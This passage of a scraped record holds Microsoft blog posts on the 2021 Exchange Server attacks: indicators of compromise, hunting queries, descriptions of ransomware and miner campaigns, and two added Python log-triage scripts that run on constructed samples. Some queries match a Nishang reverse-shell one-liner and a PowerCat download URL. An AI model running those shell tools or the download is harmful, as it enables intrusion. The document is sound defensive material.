   * Following is a PowerShell command to search for _potential_ exploitation:

     `Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'`

## Host IOCs

Microsoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks.
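The HttpProxy and OABGeneratorLog checks in the preceding section can also be run offline against exported log files. The following Python triage is an added example, not Microsoft's CSS-Exchange script; both log excerpts are constructed, and the real HttpProxy CSV carries many more columns than the ones used here.

```python
"""Offline triage of exported Exchange HttpProxy and OABGenerator logs using the
CVE-2021-26855 and CVE-2021-26858 indicators described in the post.

Added example; not Microsoft's CSS-Exchange script. Log excerpts are constructed.
"""
import csv
import fnmatch
import io
import re
from pathlib import PureWindowsPath

# Wildcards from the post's PowerShell command (PowerShell -like syntax;
# fnmatch treats '*' the same way, including across '/').
ANCHOR_PATTERN = "ServerInfo~*/*"
COOKIE_PATTERN = "Server~*/*~*"

# The only directory OABGenerator should write downloaded files into.
OAB_TEMP_DIR = r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp"

# Constructed HttpProxy excerpt: two normal requests and two SSRF-style requests
# with an empty AuthenticatedUser and a ServerInfo~ anchor containing a slash.
HTTPPROXY_SAMPLE = "\n".join([
    "DateTime,AuthenticatedUser,AnchorMailbox,BackEndCookie,UrlStem,UrlHost",
    "2021-03-01T10:00:01Z,alice@contoso.com,Sid~S-1-5-21-1-2-3-1105,Server~mail01.contoso.local~1234,/owa/,mail.contoso.com",
    "2021-03-01T10:02:17Z,,ServerInfo~mail01.contoso.local/autodiscover/autodiscover.xml,Server~mail01.contoso.local~1942,/ecp/,mail.contoso.com",
    "2021-03-01T10:02:19Z,,ServerInfo~mail01.contoso.local/mapi/emsmdb/,Server~mail01.contoso.local~1942,/ecp/,mail.contoso.com",
    "2021-03-01T10:05:00Z,bob@contoso.com,Sid~S-1-5-21-1-2-3-1106,Server~mail01.contoso.local~1234,/ews/exchange.asmx,mail.contoso.com",
])

# Constructed OABGeneratorLog excerpt (simplified line layout): one write into
# the expected Temp folder and one arbitrary file write elsewhere.
OAB_SAMPLE = "\n".join([
    r"2021-03-01T10:03:00Z,Download failed and temporary file: C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp\a1b2c3.lzx",
    r"2021-03-01T10:04:12Z,Download failed and temporary file: C:\inetpub\wwwroot\aspnet_client\help.aspx",
])

OAB_LINE = re.compile(r"Download failed and temporary file:?\s*(.+?)\s*$")


def find_ssrf_entries(csv_text):
    """Return HttpProxy rows whose AnchorMailbox or BackEndCookie matches the
    CVE-2021-26855 patterns, noting whether the request was unauthenticated."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        anchor = row.get("AnchorMailbox") or ""
        cookie = row.get("BackEndCookie") or ""
        if fnmatch.fnmatchcase(anchor, ANCHOR_PATTERN) or fnmatch.fnmatchcase(cookie, COOKIE_PATTERN):
            hits.append({
                "DateTime": row["DateTime"],
                "AnchorMailbox": anchor,
                "UrlStem": row.get("UrlStem") or "",
                # An empty AuthenticatedUser on such a request is the strongest signal.
                "unauthenticated": not (row.get("AuthenticatedUser") or "").strip(),
            })
    return hits


def find_oab_writes(log_text, temp_dir=OAB_TEMP_DIR):
    """Return target paths of 'Download failed and temporary file' entries that
    fall outside the OAB Temp directory, the CVE-2021-26858 indicator."""
    allowed = PureWindowsPath(temp_dir)
    suspicious = []
    for line in log_text.splitlines():
        match = OAB_LINE.search(line)
        if not match:
            continue
        target = PureWindowsPath(match.group(1).strip('"'))
        # PureWindowsPath compares case-insensitively; a UNC target never has the
        # local Temp folder among its parents, so it is flagged as well.
        if allowed not in target.parents:
            suspicious.append(str(target))
    return suspicious


if __name__ == "__main__":
    for hit in find_ssrf_entries(HTTPPROXY_SAMPLE):
        print("CVE-2021-26855 indicator:", hit)
    for path in find_oab_writes(OAB_SAMPLE):
        print("CVE-2021-26858 indicator: file written to", path)
```

Run it against `Import-Csv`-style exports of the real log directories named above; a hit with `unauthenticated` set is the case the post describes.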
This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.

### Hashes

Web shell hashes

### Paths

We observed web shells in the following paths:

 * _C:\inetpub\wwwroot\aspnet_client\_
 * _C:\inetpub\wwwroot\aspnet_client\system_web\_
 * _In Microsoft Exchange Server installation paths such as:_
   * _%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\_
   * _C:\Exchange\FrontEnd\HttpProxy\owa\auth\_

The web shells we detected had the following file names:

 * _web.aspx_
 * _help.aspx_
 * _document.aspx_
 * _errorEE.aspx_
 * _errorEEE.aspx_
 * _errorEW.aspx_
 * _errorFF.aspx_
 * _healthcheck.aspx_
 * _aspnet_www.aspx_
 * _aspnet_client.aspx_
 * _xx.aspx_
 * _shell.aspx_
 * _aspnet_iisstart.aspx_
 * _one.aspx_

Check for suspicious .zip, .rar, and .7z files in _C:\ProgramData\_, which may indicate possible data exfiltration.

Customers should monitor these paths for LSASS dumps:

 * _C:\windows\temp\_
 * _C:\root\_

### Tools

 * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)
 * [Nishang](<https://github.com/samratashok/nishang>)
 * [PowerCat](<https://github.com/besimorhino/powercat>)

Many of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed, it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.

## Microsoft Defender Antivirus detections

Please note that some of these detections are generic detections and not unique to this campaign or these exploits.

 * Exploit:Script/Exmann.A!dha
 * Behavior:Win32/Exmann.A
 * Backdoor:ASP/SecChecker.A
 * Backdoor:JS/Webshell _(not unique)_
 * Trojan:JS/Chopper!dha _(not unique)_
 * Behavior:Win32/DumpLsass.A!attk _(not unique)_
 * Backdoor:HTML/TwoFaceVar.B _(not unique)_

## Microsoft Defender for Endpoint detections

 * Suspicious Exchange UM process creation
 * Suspicious Exchange UM file creation
 * Possible web shell installation _(not unique)_
 * Process memory dump _(not unique)_

## Azure Sentinel detections

 * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)
 * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)
 * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)
 * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)
 * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)

## Advanced hunting queries

To locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:

### Microsoft Defender for Endpoint advanced hunting queries

Microsoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)

Additional queries and information are available via the [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.

**UMWorkerProcess.exe in Exchange creating abnormal content**

Look for Microsoft Exchange Server’s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of the CVE-2021-26858 vulnerability:

`DeviceFileEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "CacheCleanup.bin" | where FileName !endswith ".txt" | where FileName !endswith ".LOG" | where FileName !endswith ".cfg" | where FileName != "cleanup.bin"`

**UMWorkerProcess.exe spawning**

Look for Microsoft Exchange Server’s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of the CVE-2021-26857 vulnerability:

`DeviceProcessEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "wermgr.exe" | where FileName != "WerFault.exe"`

Please note that excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.

### Azure Sentinel advanced hunting queries

Azure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.

Look for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:

`SecurityEvent | where EventID == 4688 | where Process has_any ("powershell.exe", "PowerShell_ISE.exe") | where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"`

Look for downloads of PowerCat in cmd and PowerShell command line logging in Windows Event Logs:

`SecurityEvent | where EventID == 4688 | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe") | where CommandLine has "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1"`

Look for the Exchange PowerShell Snapin being loaded. This can be used to export mailbox data; subsequent command lines should be inspected to verify usage:

`SecurityEvent | where EventID == 4688 | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe") | where isnotempty(CommandLine) | where CommandLine contains "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`

The post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on Microsoft Security.

", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T05:16:59", "description": "

Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers – more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.

As organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:

 * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.
 * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.

Although the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.

## Mitigating post-exploitation activities

The first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.

_Figure 1. The Exchange Server exploit chain_

In our investigation of the on-premises Exchange Server attacks, we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.

Attackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.

We have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.

While performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:

 * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).
 * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).
 * Credential theft – While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.

In the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It’s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.

## DoejoCrypt ransomware

DoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or “reseller” who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.

The web shell writes a batch file to _C:\Windows\Temp\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.

_Figure 2. xx.bat_

Given configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.

The batch file saves the registry hives to a semi-unique location, _C:\windows\temp\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.

_Figure 3. xx.bat actions_

The _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the xx.bat file (in this instance, a version of Chopper):

_Figure 4. DoejoCrypt recon command_

After these commands are completed, the web shell drops a new payload to _C:\Windows\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.

_Figure 5. DoejoCrypt ransomware attack chain_

During the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\Windows\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.

_Figure 6. DoejoCrypt ransom note_

While the DoejoCrypt payload is the most visible outcome of the attackers’ actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_—an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.

## Lemon Duck botnet

Cryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.

Lemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.

Using a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke-Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.

_Figure 7. Example executions of Lemon Duck payload downloads_

The Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and a WMI event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MpPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\ drive and the PowerShell process.

_Figure 8. Lemon Duck payloads_

One randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.

_Figure 9. Lemon Duck post-exploitation activities_

In some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.

_Figure 10. Email subjects of possibly malicious emails_

_Figure 11. Attachment variables_

In one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers’ presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.

## Pydomer ransomware

While DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.

In this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: “Chack[Word][Country abbreviation]”:

_Figure 12. Example web shell names observed being used by the Pydomer attackers_

These web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.

_Figure 13. Pydomer post-exploitation activities_

This access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.

On systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.

_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_

The script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.

The Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.

_Figure 15. Pydomer ransom note_

Interestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.

_Figure 16. Pydomer extortion readme.txt_

## Credential theft, turf wars, and dogged persistence

If a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:

_Figure 17. Use of COM services DLL to dump LSASS process_

The number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don’t fully remediate after a compromise even after patches have been applied.
While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. 
If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. 
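The account-creation (Event ID 4720) and log-clearing (Event ID 1102) checks in the list above can be scripted against an exported Security log. The following is an added example, not code from the original post or from Microsoft: it runs over a handful of constructed event records that mirror the Security log fields, and the exposure window, host, and account names it uses are placeholders an investigator would replace with the dates the server was actually reachable before patching.

```python
"""Triage exported Windows Security events from a suspected Exchange server.

Added example, not Microsoft's code. Looks for the two log-based signals named
in the checklist: accounts created (Event ID 4720) while the server was exposed,
and the audit log being cleared (Event ID 1102). The records below are
constructed for the example; real ones would come from Get-WinEvent/wevtutil.
"""
from dataclasses import dataclass
from datetime import datetime

ACCOUNT_CREATED = 4720        # A user account was created
ADDED_TO_LOCAL_GROUP = 4732   # A member was added to a security-enabled local group
AUDIT_LOG_CLEARED = 1102      # The audit log was cleared


@dataclass(frozen=True)
class SecurityEvent:
    event_id: int
    time_created: datetime
    subject_user: str        # account that performed the action
    target_user: str = ""    # 4720: created account; 4732: added member (simplified:
                             # the real 4732 event reports the member by SID)


# Constructed sample events for a hypothetical host; account names are placeholders.
SAMPLE_EVENTS = [
    SecurityEvent(ACCOUNT_CREATED, datetime(2021, 2, 20, 9, 15), "CORP\\helpdesk", "svc_backup2"),
    SecurityEvent(4624, datetime(2021, 3, 4, 2, 10), "NT AUTHORITY\\SYSTEM"),
    SecurityEvent(ACCOUNT_CREATED, datetime(2021, 3, 4, 2, 12), "NT AUTHORITY\\SYSTEM", "sysadm$"),
    SecurityEvent(ADDED_TO_LOCAL_GROUP, datetime(2021, 3, 4, 2, 13), "NT AUTHORITY\\SYSTEM", "sysadm$"),
    SecurityEvent(AUDIT_LOG_CLEARED, datetime(2021, 3, 4, 2, 30), "NT AUTHORITY\\SYSTEM"),
    SecurityEvent(ACCOUNT_CREATED, datetime(2021, 3, 25, 11, 0), "CORP\\helpdesk", "jdoe"),
]

# Assumed exposure window (placeholder): first reachable while unpatched -> patch applied.
EXPOSED_FROM = datetime(2021, 2, 26)
PATCHED_AT = datetime(2021, 3, 10)


def account_creations_in_window(events, start, end):
    """4720 events whose creation time falls inside [start, end]."""
    return [e for e in events
            if e.event_id == ACCOUNT_CREATED and start <= e.time_created <= end]


def log_clears(events):
    """1102 events: the Security log was cleared (often to hide tracks)."""
    return [e for e in events if e.event_id == AUDIT_LOG_CLEARED]


def triage(events, exposed_from=EXPOSED_FROM, patched_at=PATCHED_AT):
    """Summarise the log-based persistence signals for the exposure window."""
    created = account_creations_in_window(events, exposed_from, patched_at)
    new_names = {e.target_user for e in created}
    # Accounts created in the window that were then added to a local group.
    group_adds = {e.target_user for e in events
                  if e.event_id == ADDED_TO_LOCAL_GROUP and e.target_user in new_names}
    # A web shell running inside the IIS worker process acts as Local System, so
    # creations attributed to SYSTEM deserve a closer look than helpdesk ones.
    by_system = {e.target_user for e in created
                 if e.subject_user.upper().endswith("\\SYSTEM")}
    return {
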